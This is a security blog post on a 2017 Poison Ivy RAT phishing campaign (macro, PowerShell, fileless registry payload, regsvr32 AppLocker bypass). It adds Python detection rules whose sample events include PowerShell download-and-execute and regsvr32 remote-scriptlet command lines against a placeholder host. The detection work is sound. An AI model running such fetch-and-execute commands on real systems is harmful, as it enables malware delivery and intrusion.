Computer News & Safety tips – Harry Waldron MVP

Malware – Poison Ivy RAT new delivery techniques DEC-2017

RAT = Remote Access Trojan

The Poison Ivy RAT has been revamped and is being delivered with new evasion and distribution techniques. TechTarget security expert Nick Lewis explains the new attack methods that enterprises should look out for.

FireEye researchers found a Poison Ivy RAT campaign that uses new social engineering, evasion and distribution techniques to spread the malware, which is capable of keylogging, password theft, and screen and video capture. What new attack and delivery methods should enterprises be on the lookout for with this remote access Trojan?

FireEye researchers wrote about an attack using the Poison Ivy RAT in which a phishing email is used to get the victim to open a malicious Word document and execute a macro. The emails targeted individuals working in the Mongolian government and claimed the documents contained webmail login instructions or information on a proposed state law.

The macro runs a PowerShell script that downloads the malware from the internet, along with decoy documents to divert the victim's attention. The script writes its payload data to the registry rather than to disk and uses regsvr32.exe to load it, so the malware runs fileless on the endpoint. This is not a vulnerability in AppLocker: regsvr32.exe is a signed Microsoft binary that default AppLocker rules allow to run, so invoking the payload through it sidesteps application whitelisting (the well-known regsvr32 AppLocker bypass). Enterprises should therefore not rely on AppLocker defaults alone, but block or monitor regsvr32.exe and watch for Office processes spawning PowerShell.
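As an added example (not from the original post, FireEye or TechTarget), the following Python runs detection logic for the chain described above over constructed Sysmon-style process-creation records: an Office application spawning a script host, PowerShell download cradles or encoded commands, PowerShell writing to the registry, and regsvr32.exe loading a remote scriptlet. The regsvr32 "/i:<URL> scrobj.dll" form is the common shape of the AppLocker bypass and is assumed here; the post itself names only regsvr32.exe. All paths, URLs and command lines are made up, and none are indicators from the campaign.

```python
"""Detection logic for the macro -> PowerShell -> registry -> regsvr32 chain.

The records are constructed Sysmon Event ID 1 style fields (ParentImage,
Image, CommandLine); they are illustrative, not telemetry from the campaign.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(ev: ProcEvent) -> List[str]:
    """Return the list of rule names that fire for one process-creation event."""
    hits: List[str] = []
    parent, child = _basename(ev.parent_image), _basename(ev.image)
    cmd = ev.command_line.lower()

    # 1. Office document macro stage: an Office app spawning a script host.
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        hits.append("office-spawned-script-host")

    # 2. PowerShell stage: download cradle, encoded payload, hidden window,
    #    or writing data into the registry (the fileless staging area).
    if child in POWERSHELL:
        if re.search(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b"
                     r"|net\.webclient|start-bitstransfer", cmd):
            hits.append("powershell-download-cradle")
        # -e / -ec / -enc / -encodedcommand followed by a base64 blob
        if re.search(r"-e(c|nc(odedcommand)?)?\s+[a-z0-9+/=]{20,}", cmd):
            hits.append("powershell-encoded-command")
        if re.search(r"-w(indowstyle)?\s+hidden", cmd) or re.search(r"-nop(rofile)?\b", cmd):
            hits.append("powershell-hidden-or-noprofile")
        if re.search(r"set-itemproperty|new-itemproperty|reg(\.exe)?\s+add|hkcu[:\\]|hklm[:\\]", cmd):
            hits.append("powershell-registry-write")

    # 3. regsvr32 AppLocker bypass: remote scriptlet via /i:<url> and scrobj.dll.
    #    Plain "regsvr32 /s somelib.dll" is normal COM registration and is not flagged.
    if child == "regsvr32.exe":
        if re.search(r"/i:\s*[\"']?https?://", cmd):
            hits.append("regsvr32-remote-scriptlet")
        if "scrobj.dll" in cmd:
            hits.append("regsvr32-scrobj")
    return hits


def triage(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Map event index -> fired rules, for events that fired at least one rule."""
    return {i: hits for i, e in enumerate(events) if (hits := detect(e))}


# Constructed sample records (hypothetical hosts, paths and placeholder base64).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoP -W Hidden -Exec Bypass -Enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString("
              "'http://payload.example.invalid/s.ps1'); "
              "Set-ItemProperty -Path HKCU:\\Software\\Example -Name d -Value $b\""),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\regsvr32.exe",
              "regsvr32.exe /s /n /u /i:http://payload.example.invalid/a.sct scrobj.dll"),
    ProcEvent(r"C:\Windows\System32\msiexec.exe",           # benign COM registration
              r"C:\Windows\System32\regsvr32.exe",
              r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'),
    ProcEvent(r"C:\Windows\explorer.exe",                    # benign document open
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r'"WINWORD.EXE" /n "C:\Users\u\Documents\report.docx"'),
]

if __name__ == "__main__":
    for idx, rules in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].image, rules)
```

The rules are deliberately narrow: regsvr32.exe is invoked constantly by installers, so only the remote-scriptlet and scrobj.dll forms are flagged, while the Office-to-PowerShell parent/child pair is a high-signal rule on its own. In a real deployment these records would come from Sysmon or an EDR, not from an inline list.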
